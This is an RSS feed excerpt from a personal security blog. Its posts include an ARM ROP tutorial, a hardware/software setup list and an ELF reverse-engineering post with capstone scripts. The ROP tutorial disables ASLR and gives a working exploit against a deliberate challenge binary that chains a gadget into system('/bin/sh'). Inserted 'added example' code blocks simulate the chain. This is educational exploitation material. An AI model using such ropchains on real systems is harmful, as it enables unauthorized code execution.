3084<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
3085
3086<ul>
3087<li>Anirudh Oppiliappan (me)</li>
3088<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
3089<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
3090</ul>
3091
3092<div class="footnotes">
3093<hr />
3094<ol>
3095<li id="fn-1">
3096<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
3097</li>
3098
3099<li id="fn-2">
3100<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
3101</li>
3102
3103<li id="fn-3">
3104<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
3105</li>
3106</ol>
3107</div>
3108]]></description><link>https://icyphox.sh/blog/fb50</link><pubDate>Mon, 05 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/fb50</guid></item><item><title>Return Oriented Programming on ARM (32-bit)</title><description><![CDATA[<p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
3109assembly to follow along. I highly recommend
3110<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
3111Basics</a>. Once you’re
3112comfortable with it, proceed with the next bit—environment setup.</p>
3113
3114<h2 id="setup">Setup</h2>
3115
3116<p>Since we’re working with the ARM architecture, there are two options to go
3117forth with:</p>
3118
3119<ol>
3120<li>Emulate—head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU.
3121And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
3122The scripts found inside should be self-explanatory.</li>
3123<li>Use actual ARM hardware, like an RPi.</li>
3124</ol>
3125
3126<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
3127may use <code>radare2</code>, IDA or anything else, really. All of which can be
3128trivially installed.</p>
3129
3130<p>And for the sake of simplicity, disable ASLR:</p>
3131
3132<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> > /proc/sys/kernel/randomize_va_space
3133</code></pre></div>
3134
3135<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
3136<a href="/static/files/roplevel2.c">roplevel2</a>.</p>
3137
3138<p>Compile it:</p>
3139
3140<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
3141</code></pre></div>
3142
3143<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
3144
3145<h2 id="a-primer-on-rop">A primer on ROP</h2>
3146
3147<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
3148used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code signing</strong>.
3149In essence, no code in the binary is actually modified and the entire exploit
3150is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
3151
3152<p>A gadget is essentially a small sequence of code (instructions), ending with
3153a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
3154code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
3155These gadgets are <em>chained</em> together by jumping (returning) from one to the next
3156to form what’s called a <strong>ropchain</strong>. At the end of a ropchain,
3157there’s generally a call to <code>system()</code>, to achieve code execution.</p>
3158
3159<p>In practice, the process of executing a ropchain is something like this:</p>
3160
3161<ul>
3162<li>confirm the existence of a stack-based buffer overflow</li>
3163<li>identify the offset at which the instruction pointer gets overwritten</li>
3164<li>locate the addresses of the gadgets you wish to use</li>
3165<li>craft your input keeping in mind the stack’s layout, and chain the addresses
3166of your gadgets</li>
3167</ul>
3168
3169<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s">beautiful video</a> where he explains ROP using “weird machines”.
3170Check it out, it might be just what you needed for that “aha!” moment :)</p>
3171
3172<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
3173that should put things into perspective.</p>
3174
3175<h2 id="exploring-our-binary">Exploring our binary</h2>
3176
3177<p>Start by running it, and entering any arbitrary string. On entering a fairly
3178large string, say, “A” × 20, we
3179see a segmentation fault occur.</p>
3180
3181<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
3182
3183<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
3184
3185<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
3186
3187<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and
3188<code>gadget</code>. Disassembling the <code>main</code> function:</p>
3189
3190<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
3191
3192<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
3193to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are
3194never actually called.</p>
3195
3196<p>Disassembling the <code>gadget</code> function:</p>
3197
3198<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
3199
3200<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
3201which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
3202instruction in the middle. This is a <strong>gadget</strong>.</p>
3203
3204<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
3205arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
3206are used for this. So this gadget effectively allows us to pass arguments to
3207functions using <code>r0</code>, and subsequently jumping to them by passing its address
3208in <code>pc</code>. Neat.</p>
3209
3210<p>Moving on to the disassembly of the <code>winner</code> function:</p>
3211
3212<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
3213
3214<p>Here, we see calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
3215So our end goal here is to, quite obviously, execute code via the <code>system()</code>
3216function.</p>
3217
3218<p>Now that we have an overview of what’s in the binary, let’s formulate a method
3219of exploitation by messing around with inputs.</p>
3220
3221<h2 id="messing-around-with-inputs">Messing around with inputs :^)</h2>
3222
3223<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
3224screenshot.</p>
3225
3226<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
3227
3228<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
3229the <code>pc</code> has been overwritten with our input.
3230So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>
3231
3232<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
3233control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
3234
3235<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
3236of the second instruction—<code>add r11, sp, #4</code>.
3237For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
3238the address of <code>winner</code>. Note the endianness.</p>
3239
3240<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")'</span> <span class="p">|</span> ./rop2
3241</code></pre></div>
3242
3243<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
3244
3245<p>The reason we don’t jump to the first instruction is because we want to control the stack
3246ourselves. If we allow <code>push {r11, lr}</code> (first instruction) to occur, the program will <code>pop</code>
3247those out after <code>winner</code> is done executing and we will no longer control
3248where it jumps to.</p>
3249
3250<p>So that didn’t do much, just prints out a string “Nothing much here…”.
3251But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
3252to do what we want (run a command, execute a shell, etc.).</p>
3253
3254<p>To do that, we’ll follow a multi-step process: </p>
3255
3256<ol>
3257<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
3258<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
3259<code>r0</code>.</li>
3260<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
3261</ol>
3262
3263<p>The pseudo-code is something like this:</p>
3264
3265<pre><code>string = AAAABBBBCCCCDDDDEEEE
3266gadget = # addr of gadget
3267binsh = # addr of /bin/sh
3268system = # addr of system()
3269
3270print(string + gadget + binsh + system)
3271</code></pre>
3272
3273<p>Clean and mean.</p>
3274
3275<h2 id="the-exploit">The exploit</h2>
3276
3277<p>To write the exploit, we’ll use Python and the absolute godsend of a library—<code>struct</code>.
3278It allows us to pack the bytes of addresses to the endianness of our choice.
3279It probably does a lot more, but who cares.</p>
3280
3281<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
3282at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>
3283
3284<pre><code>(gdb) find &system, +9999999, "/bin/sh"
3285</code></pre>
3286
3287<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
3288
3289<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
3290found from the disassemblies from earlier. Here’s the final exploit code:</p>
3291
3292<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
3293
3294<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
3295<span class="n">string</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEE"</span>
3296<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
3297<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
3298
3299<span class="nb">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
3300</code></pre></div>
3301
3302<p>Honestly, not too far off from our pseudo-code :)</p>
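<p>As an added example (not the post’s exploit), the offset hunt and the chain above as a Python 3 dry run: <code>find_offset</code> recovers where the patterned input lands in <code>pc</code>, <code>build_chain</code> packs the addresses little-endian as bytes (so it also works on Python 3, where <code>str</code> and <code>bytes</code> don’t mix), and <code>simulate</code> walks the stack words the way <code>main</code>’s epilogue and the <code>pop {r0, pc}</code> gadget consume them. The three addresses are the ones quoted in the post; nothing is executed.</p>

```python
import struct

# Addresses quoted in the post (ASLR disabled). Used only as labels here.
GADGET = 0x00010550   # gadget(), second instruction: pop {r0, pc}
SYSTEM = 0x00010538   # point in winner() where system() is called
BINSH = 0xB6F85588    # "/bin/sh" found in libc with gdb's find

PATTERN = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH"   # patterned input, as in the post
CRASH_PC = 0x46464646                          # pc gdb reported after the segfault


def find_offset(pattern: bytes, crash_pc: int) -> int:
    """Where in the input the saved pc sits: the faulting address is the four
    pattern bytes the CPU popped, so pack it little-endian and search."""
    return pattern.find(struct.pack("<I", crash_pc))


def build_chain(offset: int, *addrs: int) -> bytes:
    """Padding up to the saved pc, then each address as a little-endian word."""
    return b"A" * offset + b"".join(struct.pack("<I", a) for a in addrs)


def simulate(payload: bytes, offset: int):
    """Dry-run the chain: returns (registers, trace). The words above the
    overwritten pc are consumed the way the epilogue and the gadget consume them."""
    words = [struct.unpack_from("<I", payload, i)[0]
             for i in range(offset, len(payload) - 3, 4)]
    regs = {"r0": 0, "pc": 0}
    trace = []
    if not words:
        return regs, [("no saved pc overwritten",)]
    regs["pc"] = words.pop(0)                   # main's epilogue pops our word into pc
    trace.append(("ret", regs["pc"]))
    while True:
        if regs["pc"] == GADGET:
            if len(words) < 2:
                trace.append(("stack exhausted",))
                break
            regs["r0"] = words.pop(0)           # pop {r0, pc}: first word -> r0
            regs["pc"] = words.pop(0)           #               second word -> pc
            trace.append(("pop r0,pc", regs["r0"], regs["pc"]))
        elif regs["pc"] == SYSTEM:
            trace.append(("system", regs["r0"]))    # system() gets r0 as its argument
            break
        else:
            trace.append(("segfault", regs["pc"]))  # anything else: invalid address
            break
    return regs, trace
```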
3303
3304<p>Let’s see it in action:</p>
3305
3306<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
3307
3308<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
3309when the pipe closes, since there’s no input coming in from STDIN.
3310To get around this, we use <code>cat(1)</code> which allows us to relay input through it
3311to the shell. Nifty trick.</p>
3312
3313<h2 id="conclusion">Conclusion</h2>
3314
3315<p>This was a fairly basic challenge, with everything laid out conveniently.
3316Actual ropchaining is a little more involved, with a lot more gadgets to be chained
3317to achieve code execution.</p>
3318
3319<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
3320]]></description><link>https://icyphox.sh/blog/rop-on-arm</link><pubDate>Thu, 06 Jun 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/rop-on-arm</guid></item><item><title>My setup</title><description><![CDATA[<h2 id="hardware">Hardware</h2>
3321
3322<p>The only computer I have with me is my <a href="https://store.hp.com/us/en/mdp/laptops/envy-13">HP Envy 13 (2018)</a> (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u,
33238 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.</p>
3324
3325<p>For my phone, I use a <a href="https://www.oneplus.in/6t">OnePlus 6T</a>, running stock <a href="https://www.oneplus.in/oxygenos">OxygenOS</a>. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted.
3326I’m also a proud owner of a <a href="https://en.wikipedia.org/wiki/Nexus_5">Nexus 5</a>, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.</p>
3327
3328<p>My watch is a <a href="https://www.samsung.com/in/wearables/gear-s3-frontier-r760/">Samsung Gear S3 Frontier</a>. Tizen is definitely better than Android Wear.</p>
3329
3330<p>My keyboard, although not with me in college, is a very old <a href="https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO">Dell SK-8110</a>.
3331For the little bit of gaming that I do, I use a <a href="https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html">HP m150</a> gaming mouse. It’s the perfect size (and color).</p>
3332
3333<p>For my music, I use the <a href="https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html">Bose SoundLink II</a>.
3334Great pair of headphones, although the ear cups need replacing.</p>
3335
3336<h2 id="and-the-software">And the software</h2>
3337
3338<p><del>My distro of choice for the past ~1 year has been <a href="https://elementary.io">elementary OS</a>. I used to be an Arch Linux elitist, complete with an esoteric
3339window manager, all riced. I now use whatever JustWorks™.</del></p>
3340
3341<p><strong>Update</strong>: As of June 2019, I’ve switched over to a vanilla Debian 9 Stretch install,
3342running <a href="https://i3wm.org">i3</a> as my window manager. If you want, you can dig through my configs at my <a href="https://github.com/icyphox/dotfiles">dotfiles</a> repo. </p>
3343
3344<p>Here’s a (riced) screenshot of my desktop. </p>
3345
3346<p><img src="https://i.redd.it/jk574gworp331.png" alt="scrot" /></p>
3347
3348<p>Most of my work is done in either the browser, or the terminal.
3349My shell is pure <a href="http://www.zsh.org">zsh</a>, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need
3350a framework. It’s useless bloat. The prompt itself is generated using a framework I built in <a href="https://nim-lang.org">Nim</a>—<a href="https://github.com/icyphox/nicy">nicy</a>.
3351My primary text editor is <a href="https://neovim.org">nvim</a>. Again, all configs in my dotfiles repo linked above.
3352I manage all my passwords using <a href="https://passwordstore.org">pass(1)</a>, and I use <a href="https://github.com/carnager/rofi-pass">rofi-pass</a> to access them via <code>rofi</code>.</p>
3353
3354<p>Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace
3355clean and a single command to drop into a Kali shell.</p>
3356
3357<p>I use a DigitalOcean droplet (BLR1) as a public filehost, found at <a href="https://x.icyphox.sh">x.icyphox.sh</a>. The UI is the wonderful <a href="https://github.com/zeit/serve">serve</a>, by <a href="https://zeit.co">ZEIT</a>.
3358The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. </p>
3359
3360<p>I plan on converting my desktop back at home into a homeserver setup. Soon™.</p>
3361]]></description><link>https://icyphox.sh/blog/my-setup</link><pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/my-setup</guid></item><item><title>Python for Reverse Engineering #1: ELF Binaries</title><description><![CDATA[<p>While solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.</p>
3362
3363<p>Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually building your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.</p>
3364
3365<h2 id="setup">Setup</h2>
3366
3367<p>As the title suggests, you’re going to need a Python 3 interpreter before
3368anything else. Once you’ve confirmed beyond reasonable doubt that you do,
3369in fact, have a Python 3 interpreter installed on your system, run</p>
3370
3371<div class="codehilite"><pre><span></span><code><span class="gp">$</span> pip install capstone pyelftools
3372</code></pre></div>
3373
3374<p>where <code>capstone</code> is the disassembly engine we’ll be scripting with and <code>pyelftools</code> to help parse ELF files.</p>
3375
3376<p>With that out of the way, let’s start with an example of a basic reversing
3377challenge.</p>
3378
3379<div class="codehilite"><pre><span></span><code><span class="cm">/* chall.c */</span>
3380
3381<span class="cp">#include</span> <span class="cpf"><stdio.h></span><span class="cp"></span>
3382<span class="cp">#include</span> <span class="cpf"><stdlib.h></span><span class="cp"></span>
3383<span class="cp">#include</span> <span class="cpf"><string.h></span><span class="cp"></span>
3384
3385<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
3386 <span class="kt">char</span> <span class="o">*</span><span class="n">pw</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">9</span><span class="p">);</span>
3387 <span class="n">pw</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'a'</span><span class="p">;</span>
3388 <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o"><=</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
3389 <span class="n">pw</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">pw</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
3390 <span class="p">}</span>
3391 <span class="n">pw</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
3392 <span class="kt">char</span> <span class="o">*</span><span class="n">in</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
3393 <span class="n">printf</span><span class="p">(</span><span class="s">"password: "</span><span class="p">);</span>
3394 <span class="n">fgets</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// 'abcdefghi'</span>
3395 <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="n">pw</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
3396 <span class="n">printf</span><span class="p">(</span><span class="s">"haha yes!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
3397 <span class="p">}</span>
3398 <span class="k">else</span> <span class="p">{</span>
3399 <span class="n">printf</span><span class="p">(</span><span class="s">"nah dude</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
3400 <span class="p">}</span>
3401<span class="p">}</span>
3402</code></pre></div>
3403
3404<p>Compile it with GCC/Clang:</p>
3405
3406<div class="codehilite"><pre><span></span><code><span class="gp">$</span> gcc chall.c -o chall.elf
3407</code></pre></div>
3408
3409<h2 id="scripting">Scripting</h2>
3410
3411<p>For starters, let’s look at the different sections present in the binary.</p>
3412
3413<div class="codehilite"><pre><span></span><code><span class="c1"># sections.py</span>
3414
3415<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
3416
3417<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
3418 <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
3419 <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
3420 <span class="nb">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]),</span> <span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
3421</code></pre></div>
3422
3423<p>This script iterates through all the sections and also shows us where each is loaded. This will be pretty useful later. Running it gives us</p>
3424
3425<div class="codehilite"><pre><span></span><code><span class="go">› python sections.py</span>
3426<span class="go">0x238 .interp</span>
3427<span class="go">0x254 .note.ABI-tag</span>
3428<span class="go">0x274 .note.gnu.build-id</span>
3429<span class="go">0x298 .gnu.hash</span>
3430<span class="go">0x2c0 .dynsym</span>
3431<span class="go">0x3e0 .dynstr</span>
3432<span class="go">0x484 .gnu.version</span>
3433<span class="go">0x4a0 .gnu.version_r</span>
3434<span class="go">0x4c0 .rela.dyn</span>
3435<span class="go">0x598 .rela.plt</span>
3436<span class="go">0x610 .init</span>
3437<span class="go">0x630 .plt</span>
3438<span class="go">0x690 .plt.got</span>
3439<span class="go">0x6a0 .text</span>
3440<span class="go">0x8f4 .fini</span>
3441<span class="go">0x900 .rodata</span>
3442<span class="go">0x924 .eh_frame_hdr</span>
3443<span class="go">0x960 .eh_frame</span>
3444<span class="go">0x200d98 .init_array</span>
3445<span class="go">0x200da0 .fini_array</span>
3446<span class="go">0x200da8 .dynamic</span>
3447<span class="go">0x200f98 .got</span>
3448<span class="go">0x201000 .data</span>
3449<span class="go">0x201010 .bss</span>
3450<span class="go">0x0 .comment</span>
3451<span class="go">0x0 .symtab</span>
3452<span class="go">0x0 .strtab</span>
3453<span class="go">0x0 .shstrtab</span>
3454</code></pre></div>
3455
3456<p>Most of these aren’t relevant to us, but a few sections here are to be noted. The <code>.text</code> section contains the instructions (opcodes) that we’re after. The <code>.data</code> section should have strings and constants initialized at compile time. Finally, the <code>.plt</code> which is the Procedure Linkage Table and the <code>.got</code>, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.</p>
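<p>As an added example (not part of the post, and not pyelftools’ internals), a stdlib-only reader for the ELF64 section header table that recovers the same <code>(address, name)</code> pairs <code>sections.py</code> prints, plus the equivalent of <code>get_section_by_name(...).data()</code>. The <code>build_minimal_elf</code> helper constructs a tiny ELF64 image so it runs without <code>chall.elf</code>; only little-endian ELF64 is handled.</p>

```python
import struct

# Added example, stdlib only: a minimal reader for the ELF64 section header
# table, i.e. the part of the format sections.py gets from pyelftools.
ELF_HDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
SEC_HDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr, 64 bytes


def section_headers(blob: bytes):
    """Return (list of raw Elf64_Shdr tuples, index of .shstrtab)."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if blob[4] != 2 or blob[5] != 1:             # EI_CLASS=ELFCLASS64, EI_DATA=ELFDATA2LSB
        raise ValueError("only little-endian ELF64 is handled here")
    ehdr = ELF_HDR.unpack_from(blob, 0)
    e_shoff, e_shentsize, e_shnum, e_shstrndx = ehdr[6], ehdr[11], ehdr[12], ehdr[13]
    if e_shentsize != SEC_HDR.size:
        raise ValueError("unexpected section header size")
    if e_shoff + e_shnum * e_shentsize > len(blob):
        raise ValueError("section header table runs past end of file")
    shdrs = [SEC_HDR.unpack_from(blob, e_shoff + i * e_shentsize) for i in range(e_shnum)]
    return shdrs, e_shstrndx


def list_sections(blob: bytes):
    """[(sh_addr, name), ...] in table order, the pairs sections.py prints."""
    shdrs, strndx = section_headers(blob)
    st = shdrs[strndx]
    strtab = blob[st[4]:st[4] + st[5]]           # sh_offset, sh_size of .shstrtab

    def name(off: int) -> str:
        return strtab[off:strtab.index(b"\0", off)].decode()

    return [(sh[3], name(sh[0])) for sh in shdrs]  # sh_addr, sh_name


def section_bytes(blob: bytes, wanted: str) -> bytes:
    """Raw contents of a named section, like get_section_by_name(...).data()."""
    shdrs, _ = section_headers(blob)
    for sh, (_, name) in zip(shdrs, list_sections(blob)):
        if name == wanted:
            return blob[sh[4]:sh[4] + sh[5]]
    raise KeyError(wanted)


def build_minimal_elf(text: bytes, text_addr: int = 0x6A0) -> bytes:
    """Constructed test input: an ELF64 image with only a null section, .text
    and .shstrtab, and no program headers. Enough to exercise the parser."""
    shstrtab = b"\0.text\0.shstrtab\0"           # name offsets: .text=1, .shstrtab=7
    text_off = ELF_HDR.size
    str_off = text_off + len(text)
    shoff = str_off + len(shstrtab)
    shoff += (-shoff) % 8                         # align the section header table
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
    ehdr = ELF_HDR.pack(ident, 2, 62, 1, text_addr, 0, shoff, 0,
                        ELF_HDR.size, 0, 0, SEC_HDR.size, 3, 2)   # ET_EXEC, EM_X86_64
    null_sh = SEC_HDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    text_sh = SEC_HDR.pack(1, 1, 6, text_addr, text_off, len(text), 0, 0, 16, 0)  # PROGBITS, AX
    str_sh = SEC_HDR.pack(7, 3, 0, 0, str_off, len(shstrtab), 0, 0, 1, 0)         # STRTAB
    body = ehdr + text + shstrtab
    body += b"\0" * (shoff - len(body))
    return body + null_sh + text_sh + str_sh
```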
3457
3458<p>Since we know that the <code>.text</code> section has the opcodes, let’s disassemble the binary starting at that address.</p>
3459
3460<div class="codehilite"><pre><span></span><code><span class="c1"># disas1.py</span>
3461
3462<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
3463<span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>
3464
3465<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
3466 <span class="n">elf</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
3467 <span class="n">code</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">get_section_by_name</span><span class="p">(</span><span class="s1">'.text'</span><span class="p">)</span>
3468 <span class="n">ops</span> <span class="o">=</span> <span class="n">code</span><span class="o">.</span><span class="n">data</span><span class="p">()</span>
3469 <span class="n">addr</span> <span class="o">=</span> <span class="n">code</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]</span>
3470 <span class="n">md</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
3471 <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">md</span><span class="o">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">ops</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
3472 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'0x</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">address</span><span class="si">:</span><span class="s1">x</span><span class="si">}</span><span class="s1">:</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">mnemonic</span><span class="si">}</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">op_str</span><span class="si">}</span><span class="s1">'</span><span class="p">)</span>
3473</code></pre></div>

<p>The code is fairly straightforward (I think). On running it, we should see this:</p>

<div class="codehilite"><pre><span></span><code><span class="go">› python disas1.py | less </span>
<span class="go">0x6a0: xor ebp, ebp</span>
<span class="go">0x6a2: mov r9, rdx</span>
<span class="go">0x6a5: pop rsi</span>
<span class="go">0x6a6: mov rdx, rsp</span>
<span class="go">0x6a9: and rsp, 0xfffffffffffffff0</span>
<span class="go">0x6ad: push rax</span>
<span class="go">0x6ae: push rsp</span>
<span class="go">0x6af: lea r8, [rip + 0x23a]</span>
